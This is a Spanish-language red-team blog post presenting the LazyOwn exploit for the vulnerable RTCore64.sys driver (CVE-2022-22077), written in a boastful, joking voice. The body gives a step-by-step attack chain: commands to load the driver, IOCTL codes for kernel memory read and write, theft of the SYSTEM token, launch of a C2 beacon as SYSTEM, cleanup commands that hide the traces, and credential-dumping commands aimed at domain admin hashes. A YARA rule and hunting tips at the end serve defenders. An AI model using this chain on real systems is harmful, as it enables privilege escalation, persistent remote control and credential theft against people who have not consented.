
# Marco de explotación BYOVD para CVE-2022-22077 dirigido a RTCore64.sys Demuestra el robo de tokens del kernel, la escalada de privilegios a SYSTEM y la integración de balizas C2 para operaciones de red team e investigación de seguridad.
Este documento proporciona una visión general completa del marco de explotación de CVE-2022-22077, un sofisticado kit de herramientas de ataque BYOVD (Bring Your Own Vulnerable Driver) que apunta a la vulnerabilidad del controlador RTCore64.sys. Este marco demuestra técnicas avanzadas de explotación del kernel de Windows con fines educativos y de investigación en seguridad.
El material cubierto incluye la base técnica de la vulnerabilidad, la arquitectura del marco y la integración con el conjunto de herramientas más amplio LazyOwn RedTeam. Para un análisis detallado de la vulnerabilidad, consulte Análisis de Vulnerabilidad. Para detalles específicos de implementación de componentes individuales, consulte Marco de Explotación.
CVE-2022-22077 es una vulnerabilidad de alta gravedad (puntuación CVSS 7.8) que afecta al controlador RTCore64.sys distribuido con las aplicaciones MSI Center y Dragon Center. La vulnerabilidad se origina en interfaces IOCTL expuestas que permiten a usuarios sin privilegios realizar lecturas y escrituras arbitrarias de memoria física, eludiendo eficazmente todos los mecanismos de seguridad del kernel de Windows.
El marco implementa el acceso a la memoria del kernel a través de un enfoque estructurado utilizando las vulnerabilidades del controlador RTCore64.sys:
Por: grisun0, Arquitecto Jefe del Caos del Kernel & Susurrador de Controladores a Tiempo Parcial - LazyOwn RedTeam
7 min de lectura · Publicado a las 3:33 AM porque “¿HVCI? Nunca la conocí.”
“La mejor manera de poseer un sistema es pedirle permiso a su propio controlador — cortésmente, con IOCTLs.” — grisun0, probablemente mientras hacía ingeniería inversa de MSI Afterburner en calzoncillos
Saltémonos la parte donde finjo que esto es normal.
Si estás leyendo esto, probablemente eres:
Bienvenido a LazyOwn RedTeam™, donde no evitamos la seguridad — la invitamos a cenar y luego le robamos la cartera.
Hoy te presento a RTCore64.sys — no un controlador, no una herramienta, sino un exploit de kernel completamente funcional disfrazado de utilidad para overclockear tu RTX 3090.
Y sí — hay un giro.
Spoiler: Todavía usa cmd.exe. Spoiler más grande: Ahora también usa beacon.exe. Spoiler aún más grande: Ambos se ejecutan ahora con privilegios NT AUTHORITY\SYSTEM, gracias a un controlador que pensó que “acceso arbitrario a la memoria del kernel” era una característica de calidad de vida.
🕳️ ¿Qué es RTCore64.sys? (O: “Cómo Convertir MSI Afterburner en una Puerta Trasera Ring 0”) Imagina instalar un controlador para ajustar el voltaje de tu GPU… y accidentalmente darte acceso completo de lectura/escritura a la memoria del kernel.
Esto es CVE-2022–22077 — una vulnerabilidad tan hermosamente imprudente que hace que capcom.sys parezca una bibliotecaria tímida.
Mientras capcom.sys pedía amablemente ejecutar tu callback, RTCore64.sys simplemente te entrega las llaves del reino — sin hacer preguntas.
“Aquí tienes un IOCTL. Escribe cualquier dirección. Lee cualquier valor. Date gusto.” — MSI, probablemente
Y como somos profesionales, no llamamos a DeviceIoControl al azar. Robamos tokens de SYSTEM, parchamos estructuras EPROCESS y generamos shells de SYSTEM — todo antes de que tu GPU alcance los 70°C.
Déjame guiarte a través de los cinco actos de este atraco digital:
Falso.
En su interior está RTCore64.sys — un controlador firmado y vulnerable que expone IOCTLs como:
0x80002048 → Leer memoria del kernel 0x8000204c → Escribir memoria del kernel Sin validación. Sin comprobaciones de cordura. Solo poder crudo y sin filtrar.
“¿Por qué hacer sandbox cuando puedes hacer kernel?” — Equipo de Ingeniería de MSI, 2019
Simplemente:
sc create RTCore64 binPath=C:\Windows\Temp\RTCore64.sys type=kernel
sc start RTCore64
Boom. Acceso al kernel desbloqueado.
Requisito previo: SeLoadDriverPrivilege (que ya tienes, porque eres así de bueno). Bonus: HVCI deshabilitado (porque quién necesita virtualización cuando tienes estilo?).
CreateFileW(L"\\.\RTCore64", ...) → Agarra el boleto dorado. EnumDeviceDrivers() → Encuentra la base de ntoskrnl.exe. Analiza PsInitialSystemProcess desde el disco → Obtén el offset. Lee el EPROCESS de SYSTEM → Roba su token. Escribe el token en tu propio proceso → Felicidades, eres Dios. CreateProcessW(L"beacon.exe", ...) → Lanza tu payload como SYSTEM. Sin shellcode. Sin cadenas ROP. Solo pura manipulación de objetos del kernel sin adulterar.
del C:\Windows\Temp\RTCore64.sys
sc delete RTCore64
Puf. Desaparecido. Como un fantasma que overclockeó tu RAM y se esfumó.
tasklist /m mimilib.dll
eventcreate /t INFORMATION /id 1 /l APPLICATION /d “sekurlsa::logonpasswords”
type C:\Windows\System32\mimilsa.log
→ Hashes de Admin de Dominio? Verificado. → Contraseñas en texto plano? Verificado. → Golden Tickets? En camino.
RTCore64.sys no es un lobo solitario. Es un nodo en el Marco LazyOwn RedTeam — un ecosistema modular, extensible y ligeramente desquiciado de herramientas ofensivas.
Imagina esto:
Genera shellcode con ShadowLink. Ofúscalo con LazyAddons. Entrégalo mediante el robo de tokens de RTCore64.sys. Ejecútalo como SYSTEM mediante CreateProcessW. Todo orquestado desde un C2 que parece una descarga de Steam. ¿Y la mejor parte? Todo es de código abierto. Porque la transparencia es la mejor opsec.
👉 Míralo en acción (mentalmente, porque no estoy filmando esto a las 4 AM) solo bromea, toma palomitas y mira:
https://www.youtube.com/shorts/V2tqH53LRIw
Sí. Eso es un beacon.exe de Windows:
Generado mediante robo de tokens de RTCore64.sys Ejecutándose como NT AUTHORITY\SYSTEM Llamando de vuelta a tu C2 Todo mientras el Administrador de Tareas dice “Parece normal para mí” Y ni siquiera se ejecuta como administrador. Es así de bueno.
No solo soy un red teamer. Soy un red teamer responsable. Así que aquí tienes información gratuita:
yara
rule RTCore64_Based_Kernel_Exploit {
meta:
author = “LazyOwn BlueTeam”
description = “Detecta la explotación de RTCore64.sys mediante IOCTLs y patrones conocidos”
license = “GPLv3”
strings:
$driver_name = “RTCore64.sys” ascii wide
$ioctl_read = { 80 00 20 48 } // 0x80002048
$ioctl_write = { 80 00 20 4C } // 0x8000204c
$create_device = “CreateFileW” ascii
$device_path = “\\.\RTCore64” ascii wide
$token_steal = “PsInitialSystemProcess” ascii
condition:
all of them
}
Busca:
RTCore64.sys cargado fuera de C:\Program Files (x86)\MSI Afterburner
Llamadas a DeviceIoControl con 0x80002048 o 0x8000204c
Cambios de token de proceso de bajo privilegio a SYSTEM
sc create o sc start dirigidos a RTCore64
PsInitialSystemProcess siendo leído desde la memoria del kernel
¿Ves esta combinación?
Te han RTCore’ado.
Esta herramienta se publica únicamente para fines educativos y de red teaming ético.
No la uses en sistemas que no sean tuyos o para los que no tengas permiso explícito de prueba.
El mal uso puede resultar en:
Ser despedido Ser demandado Que tu GPU desarrolle un complejo de dios Que Microsoft revoque la firma de tu controlador (de nuevo) Que tu mamá te pregunte por qué estás “hackeando el gobierno” otra vez No asumo ninguna responsabilidad. Estás por tu cuenta, vaquero.
Herramientas como RTCore64.sys no existen para romper sistemas — sino para revelar su fragilidad.
Para entrenar defensores. Para probar la lógica de detección. Para hacer que tu PC de juegos sea el dispositivo más peligroso de la red.
Así que adelante. Aprende. Prueba. Rompe cosas (éticamente).
Y recuerda:
La mejor seguridad es aquella que te hace preguntarte si tu tarjeta gráfica está conspirando contra ti.
🔐 grisun0, cerrando sesión — desde un depurador de kernel, probablemente dentro de la VRAM de tu GPU.
BYOVD Suplantación de Tokens RTCore64.sys Explotación del Kernel Red Teaming LazyOwn
P.D. Si tu GPU comienza a overclockearse sola a las 3 AM… de nada. 🚀
🔗 CVE-2022-22077 en NVD
🔗 https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/
🔗 https://github.com/grisuno/beacon